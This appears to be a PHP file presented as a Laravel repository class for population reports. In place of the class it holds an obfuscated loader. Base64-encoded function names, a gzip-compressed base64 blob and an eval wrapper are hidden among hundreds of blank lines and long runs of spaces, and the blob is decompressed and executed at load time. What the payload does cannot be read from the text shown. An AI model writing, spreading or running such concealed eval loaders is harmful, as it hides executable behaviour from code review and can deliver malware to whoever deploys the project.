<?php 
        $__='printf';$_='Loading app/Repositories/LaporanPendudukRepository.php';
        



























































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































                                                                                                                                                                                                                     $________;
